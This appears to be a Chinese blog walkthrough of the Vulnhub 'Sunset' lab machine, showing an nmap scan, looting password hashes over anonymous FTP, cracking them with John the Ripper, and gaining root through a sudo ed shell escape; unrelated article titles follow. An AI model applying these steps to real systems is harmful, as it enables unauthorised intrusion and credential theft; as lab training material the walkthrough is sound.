Sunset: Vulnhub Walkthrough
主机扫描:
╰─ nmap -p1-65535 -sV -A 10.10.202.147
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 root root 1062 Jul 29 00:00 backup
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 10.10.202.147:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 71:bd:fa:c5:8c:88:7c:22:14:c4:20:03:32:36:05:d6 (RSA)
| 256 35:92:8e:16:43:0c:39:88:8e:83:0d:e2:2c:a4:65:91 (ECDSA)
|_ 256 45:c5:40:14:49:cf:80:3c:41:4f:bb:22:6c:80:1e:fe (ED25519)
匿名访问FTP
username: anonymous
password:空
╰─ cat backup
CREDENTIALS:
office:$6$$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCr/avWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.
datacenter:$6$$3QW/J4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ/6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/
sky:$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/
使用john进行暴力破解
将其hash复制到新的文本,1.txt
╰─ john 1.txt
查看爆破成功的密码
╰─ john --show 1.txt
sky:sky
sunset:cheer14
space:space
经过尝试:sunset:cheer14 可以登录系统
尝试提权:
sudo /usr/bin/ed
!/bin/bash
root@sunset:/home/sunset#
root@sunset:/home/sunset# id
uid=0(root) gid=0(root) groups=0(root)
完!
最新文章
- ADO.net 更新和插入数据 遇到null 执行不成功
- DataList:HTML5中的input输入框自动提示宝器
- 暑假前的flag
- win10 剪贴板 拒绝访问 Cannot open clipboard
- FreeMaker实现变量求和
- 【初探HTML本相】道之真谛不过自然,html标签脱俗还真
- John the Ripper
- Haskell 笔记 ①
- 4Web镇之旅:开始链接
- Hadoop学习笔记: sqoop配置与使用
- 小记:获取系统时间的long值,格式化成可读时间。
- Unity3d 巫师3Ciri的渲染
- (大数据工程师学习路径)第二步 Vim编辑器----Vim文档编辑
- cocos2dx中关于Action动作的相关API的具体介绍
- 图解JQUERY尺寸及位置定义
- git版本回退
- PyQt5 入门
- 第一个Django页面(2)
- liunx进程管理之进程介绍
- PAT 1087 有多少不同的值(20)(STL-set代码)